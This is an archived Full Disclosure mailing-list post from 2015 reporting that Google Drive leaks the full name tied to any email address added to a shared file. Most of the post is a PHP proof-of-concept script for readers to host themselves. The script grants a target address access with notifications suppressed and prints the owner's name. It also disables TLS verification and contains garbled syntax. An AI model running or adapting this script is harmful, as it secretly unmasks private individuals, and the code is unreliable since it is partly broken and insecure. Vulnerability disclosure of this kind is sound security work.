[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[FD] full name disclosure information leak in google drive

To: fulldisclosure@xxxxxxxxxxxx
Subject: [FD] full name disclosure information leak in google drive
From: kevin mcsheehan <kevin@xxxxxxxxxxxxx>
Date: Wed, 21 Jan 2015 20:26:57 +0000

exploit title: full name disclosure information leak in google drive
software link: https://drive.google.com/drive/#my-drive
author: kevin mcsheehan
website: http://mcsheehan.com
email: kevin@xxxxxxxxxxxxx
date: 01/20/15

source: http://mcsheehan.com/?p=15

description: google drive leaks the full name of a target emailaddress when said email address is associated with an uploaded file.the full name is displayed whether or not the target has made thatinformation publicly accessible by creating a google plus account. insome cases, full name disclosure isn't limited to @gmail/@google andthe full names of @hotmail, @yahoo, etc. users may also be revealed. alive poc example can be used at the aforementioned source url, orhosted yourself with the following proof of concept php code whichutilizeshttps://github.com/google/google-api-php-client/archive/master.zip andgoogle drive api:


<?php

//discovered by kevin@xxxxxxxxxxxxx / http://mcsheehan.com

//instructions: using google developers console, generate apicredentials after enabling drive api on a new project and then editthis file with said credentials (i.e. clientid, clientsecret,redirecturi) - this also requires google-api-php-client which can bedownloaded here:https://github.com/google/google-api-php-client/archive/master.zip


$targetEmail = 'target@xxxxxxxxx';

require_once "google-api-php-client/src/Google/Client.php";
require_once "google-api-php-client/src/Google/Service/Drive.php";
require_once "google-api-php-client/src/Google/Auth/AssertionCredentials.php";

$cScope         =   'https://www.googleapis.com/auth/drive';
$cClientID      =   '[clientid]';
$cClientSecret  =   '[clientsecret]';
$cRedirectURI   =   '[redirecturi]'; //redirect to this file

$cAuthCode      =   '';

if(isset( $_GET['code'])) {
    $cAuthCode = $_GET['code'];
}
if (!($cAuthCode) == "null") {
    $rsParams = array(
        'scope' => $cScope,
        'state' => 'security_token',
        'redirect_uri' => $cRedirectURI,
        'response_type' => 'code',
        'client_id' => $cClientID,
        'access_type' => 'offline',
        'approval_prompt' => 'force'
        );

$cOauthURL = 'https://accounts.google.com/o/oauth2/auth?' .http_build_query($rsParams);

    header('Location: ' . $cOauthURL);
    exit();
}
elseif (empty($cRefreshToken)) {

$authURL = "https://www.googleapis.com/oauth2/v3/token?code="; .$cAuthCode . "&client_id=" . $cClientID . "&client_secret=" .$cClientSecret . "&redirect_uri=" . $cRedirectURI ."&grant_type=authorization_code";

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_URL, $authURL);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, "");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $output = curl_exec($ch);
    curl_close($ch);

    $oToken = json_decode($output);

    $accessToken = $oToken->access_token;
    $refreshToken = $oToken->refresh_token;

}

    $createURL = "https://www.googleapis.com/drive/v2/files";;
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_HTTPHEADER, array(
        'Content-Type: application/json',
        "Authorization:  Bearer " . $accessToken
        ));
    curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'POST');
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_URL, $createURL);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, "{\"title\": \"revealyourself1\"}");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $output = curl_exec($ch);
    curl_close($ch);

    $oToken = json_decode($output);
    $fileID = $oToken->id;

$compileJSON = array("role" => "writer","type" => "user","value"=> $targetEmail,"emailAddress" => $targetEmail);

    $jsonPostData = json_encode($compileJSON);

$addUser = "https://www.googleapis.com/drive/v2/files/"; . $fileID.. "/permissions?sendNotificationEmails=false";

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_HTTPHEADER, array(
        'Content-Type: application/json',
        "Authorization:  Bearer " . $accessToken
        ));
    curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'POST');
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_URL, $addUser);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $jsonPostData);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $output = curl_exec($ch);
    curl_close($ch);

    if (strpos($output,'error') !== false) {
        echo 'error feedback from google:<br><br>' . $output;
    } else {
        $oToken = json_decode($output);
        $fullName = $oToken->name;
        echo $targetEmail . ' is ' . $fullName;
    }

?>


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Follow-Ups:
- Re: [FD] full name disclosure information leak in google drive
  - From: Daniel Miller

Prev by Date: [FD] CVE-2015-1169 - CAS Server 3.5.2 allows remote attackers to bypass LDAP authentication via crafted wildcards.
Next by Date: Re: [FD] full name disclosure information leak in google drive
Previous by thread: Re: [FD] CVE-2015-1169 - CAS Server 3.5.2 allows remote attackers to bypass LDAP authentication via crafted wildcards.
Next by thread: Re: [FD] full name disclosure information leak in google drive
Index(es):
- Date
- Thread